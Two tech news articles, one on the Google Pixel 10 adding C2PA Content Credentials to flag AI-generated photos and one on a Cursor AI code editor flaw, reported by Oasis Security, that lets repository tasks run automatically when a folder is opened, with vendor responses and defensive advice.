Image by Jonathan Kemper, from Unsplash
Pixel 10 Lets Users Check If Photos Are AI-Made
- Written by Kiara Fabbri Former Tech News Writer
- Fact-Checked by Sarah Frazier Former Content Manager
The Made by Google 2025 event brought news about the Pixel 10 lineup which will be the first to support C2PA Content Credentials directly in Pixel Camera and Google Photos.
In a rush? Here are the quick facts:
- Pixel 10 is first phone with built-in C2PA Content Credentials.
- Credentials prove how and when images were created.
- Pixel Camera achieved C2PA Assurance Level 2 security rating.
According to Google , “The Pixel 10 lineup is the first to have Content Credentials built in across every photo created by Pixel Camera.” These credentials act like a digital signature that proves how and when an image was made, helping people tell the difference between real photos and AI-generated ones.
These credentials act like a digital signature, serving as proof of origin and time stamp for images, aimed at helping users identify genuine photos from AI-generated content.
The Content Credentials system operates under the Coalition for Content Provenance and Authenticity (C2PA) which brings together major companies to create standards to track the origin of digital media. The steering committee member Google stated that this development becomes crucial as generative AI technology makes it difficult to distinguish between real and synthetic content.
“Generative AI can help us all to be more creative, productive, and innovative. But it can be hard to tell the difference between content that’s been AI-generated, and content created without AI. The ability to verify the source and history—or provenance—of digital content is more important than ever,” Google explained.
The Pixel 10 system operates through the combination of Tensor G5 processing power and Titan M2 security chip and Android hardware security features. The Pixel Camera app received the highest security rating of Assurance Level 2 from the C2PA Conformance Program. Google says this level is “only possible on the Android platform.”
To protect privacy, Google created a “One-and-Done” system which generates distinct certificates for each image to prevent users from tracing multiple photos to a single person. The phones maintain offline trusted time-stamps which enable credentials to stay valid when users take photos without internet access.
Google plans to expand Content Credentials to more products soon, saying it is “a tangible step toward more media transparency and trust.”

Image by Sigmund, from Unsplash
Cursor AI Code Editor Flaw Lets Hackers Run Code Automatically
- Written by Kiara Fabbri Former Tech News Writer
- Fact-Checked by Sarah Frazier Former Content Manager
More than one million developers use Cursor as their AI code editor but the tool has been found to contain a critical security flaw.
In a rush? Here are the quick facts:
- Cursor AI editor runs malicious code from repos without user consent.
- Workspace Trust is disabled by default in Cursor.
- Cursor refuses to change default settings despite warnings.
According to Oasis Security , the security flaw in Cursor enables attackers to execute malicious repository code automatically as developers open their projects, with no clicks or confirmation required.
Cursor is based on Visual Studio Code (VS Code) but ships with an important security feature, Workspace Trust, turned off by default. In this way, attackers can embed malicious files into project folders which execute automatically the moment users access the folder.
That code could steal credentials, API tokens, and configuration files, or even connect to hacker-controlled servers. BleepingComputer noted that because developers’ laptops often store cloud keys and permissions, creating an entry point for attackers to spread their attacks into corporate systems.
VS Code itself is not affected because it blocks these automatic runs unless the user explicitly grants trust. To demonstrate the danger, Oasis shared a proof-of-concept showing how a simple task could send a developer’s username to an external server.
Cursor, however, has no plans to change its default settings. The company explained that “Workspace Trust disables AI and other features our users want to use within the product.” Instead, it says it will update security guidance to help users enable Workspace Trust manually if they choose.
For now, Oasis Security advises users to activate Workspace Trust in Cursor while conducting project searches for autorun tasks, and testing unknown repositories inside virtual machines.
“This has the potential to leak sensitive credentials, modify files, or serve as a vector for broader system compromise,” Oasis warned.